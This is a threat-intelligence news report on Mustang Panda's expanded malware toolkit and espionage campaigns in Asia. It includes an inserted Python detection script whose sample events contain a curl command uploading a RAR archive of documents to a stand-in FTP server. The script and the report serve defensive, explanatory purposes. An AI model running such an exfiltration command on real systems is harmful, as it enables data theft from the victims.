The threat actor tracked as Mustang Panda has upgraded its malware arsenal with new tools to support data exfiltration and the deployment of next-stage payloads, according to fresh findings from Trend Micro.
The cybersecurity company, which tracks the activity cluster under the moniker Earth Preta, said it observed "the propagation of PUBLOAD via a variant of the worm HIUPAN."
PUBLOAD is a known downloader associated with Mustang Panda since early 2022, deployed in cyber attacks targeting government agencies in the Asia-Pacific (APAC) region to distribute the PlugX malware.
"PUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option," security researchers Lenart Bermejo, Sunny Lu, and Ted Lee said.
Mustang Panda's use of removable devices as a propagation vector for HIUPAN was first documented by Trend Micro in March 2023. The worm is tracked by Google-owned Mandiant as MISTCLOAK, which it discovered in connection with a cyber espionage campaign targeting the Philippines that may have begun as early as September 2021.
PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx), while also serving as a conduit for a new tool dubbed FDMTP, which is a "simple malware downloader" implemented based on TouchSocket over Duplex Message Transport Protocol (DMTP).
The collected information is compressed into a RAR archive and exfiltrated to an attacker-controlled FTP server using cURL. Alternatively, Mustang Panda has also been observed deploying a custom tool called PTSOCKET that can transmit data in multi-thread mode.
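To make the exfiltration step above concrete from a detection standpoint, here is an added example (my own code, not code from Trend Micro or the report) that scans process-creation events for cURL uploading a RAR archive to an FTP server; the event format, hostnames, IP address and file paths are constructed assumptions.

```python
import re
import shlex

# Constructed sample process-creation events (not from the report): a benign
# curl download, a curl upload of a RAR archive to an FTP server matching the
# exfiltration pattern described above, and an unrelated archiver process.
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -s -o update.bin https://example.com/update.bin"},
    {"host": "ws-07", "image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe -T C:\\Users\\Public\\docs.rar ftp://203.0.113.5/up/ --user u:p"},
    {"host": "ws-07", "image": "C:\\Program Files\\WinRAR\\Rar.exe",
     "cmdline": "Rar.exe a -r C:\\Users\\Public\\docs.rar *.doc *.docx *.pdf"},
]

FTP_URL = re.compile(r"^ftps?://", re.IGNORECASE)


def curl_ftp_archive_upload(event):
    """Return the uploaded file path if the event is curl sending a .rar file
    (-T / --upload-file) to an FTP or FTPS URL, otherwise None."""
    image = event.get("image", "").replace("\\", "/").lower()
    if not (image.endswith("/curl.exe") or image.endswith("/curl")):
        return None
    # posix=False keeps Windows backslashes intact instead of treating them as escapes
    args = shlex.split(event.get("cmdline", ""), posix=False)
    upload_file = None
    ftp_target = False
    for i, arg in enumerate(args):
        token = arg.strip('"')
        if token in ("-T", "--upload-file") and i + 1 < len(args):
            upload_file = args[i + 1].strip('"')
        elif token.startswith("--upload-file="):
            upload_file = token.split("=", 1)[1]
        elif FTP_URL.match(token):
            ftp_target = True
    if upload_file and ftp_target and upload_file.lower().endswith(".rar"):
        return upload_file
    return None


def flag_exfil_events(events):
    """Return (host, archive path) for every event that matches the pattern."""
    hits = []
    for event in events:
        path = curl_ftp_archive_upload(event)
        if path:
            hits.append((event["host"], path))
    return hits
```

In practice the same logic maps onto a SIEM rule keyed on the curl image name, an upload flag and an ftp:// destination, with the archive extension as a tuning knob.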
Furthermore, Trend Micro has attributed to the threat actor a "fast-paced" spear-phishing campaign that it observed in June 2024 distributing email messages with a .url attachment, which, when opened, is used to deploy a signed downloader called DOWNBAIT.
The campaign is believed to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan, based on the filenames and content of the decoy documents used.
DOWNBAIT is a first-stage loader tool that's used to obtain and execute the PULLBAIT shellcode in memory, which then downloads and executes the first-stage backdoor referred to as CBROVER.
The implant, for its part, provides file download and remote shell execution capabilities, alongside acting as a delivery mechanism for the PlugX remote access trojan (RAT). PlugX then takes care of launching another specialized file collector called FILESAC that can gather the victim's files.
The disclosure comes after Palo Alto Networks Unit 42 detailed Mustang Panda's abuse of Visual Studio Code's built-in reverse shell feature to gain a foothold in target networks, demonstrating that the threat actor is actively changing its modus operandi.
"Earth Preta has shown significant advancements in their malware deployment and strategies, particularly in their campaigns targeting government entities," the researchers added. "The group has evolved their tactics, [...] leveraging multi-stage downloaders (from DOWNBAIT to PlugX) and possibly exploiting Microsoft's cloud services for data exfiltration."